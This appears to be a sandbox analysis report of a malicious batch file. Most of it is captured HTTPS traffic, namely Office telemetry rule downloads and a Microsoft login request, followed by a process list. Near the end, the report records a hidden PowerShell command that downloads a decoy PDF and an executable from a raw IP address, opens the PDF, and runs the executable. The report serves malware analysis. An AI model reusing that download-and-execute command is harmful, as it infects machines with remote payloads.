                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                        x-ms-request-id: 77ea0a00-001e-0066-6ed3-45561e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125409Z-1746fd949bd6zq92hC1EWRry480000000170000000005nr7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        143192.168.2.74987220.190.177.22443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Wed, 04 Dec 2024 12:53:09 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C525_BAY
                                                                                                                                                                                                        x-ms-request-id: fe638524-1879-415f-ab16-1c63c7cc124d
                                                                                                                                                                                                        PPServer: PPV: 30 H: PH1PEPF0001B8BB V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:09 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 11390
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        144192.168.2.74987113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:09 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                        x-ms-request-id: 0e3f3dcd-301e-001f-2cd1-45aa3a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125409Z-1746fd949bdlqd7fhC1EWR6vt000000001ag000000009nbz
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        145192.168.2.74987013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:09 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                        x-ms-request-id: 52797c88-801e-00ac-33cb-45fd65000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125409Z-1746fd949bdjzh7thC1EWR3g640000000180000000007kdw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        146192.168.2.74987313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:10 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:13 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                        x-ms-request-id: 8c86af4e-801e-00a3-6fcc-457cfb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125413Z-1746fd949bdfg4slhC1EWR34t00000000140000000005pv4
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        147192.168.2.74987413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:11 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                        x-ms-request-id: 577422f4-d01e-00ad-48c3-45e942000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125411Z-1746fd949bd6zq92hC1EWRry48000000013000000000b0wr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        148192.168.2.74987513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:11 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1388
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                        x-ms-request-id: 2b71c36d-501e-008c-14c5-45cd39000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125411Z-1746fd949bdjzh7thC1EWR3g640000000180000000007kgb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        149192.168.2.74987613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:11 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:12 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                        x-ms-request-id: 1e2a9e05-401e-0078-21cb-454d34000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125412Z-1746fd949bdhk6hphC1EWRaw3c000000011g00000000456s
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:12 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:07:53:03
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" "
                                                                                                                                                                                                        Imagebase:0x7ff69dc20000
                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                        Start time:07:53:03
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:07:53:04
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""
                                                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                        Start time:07:53:12
                                                                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
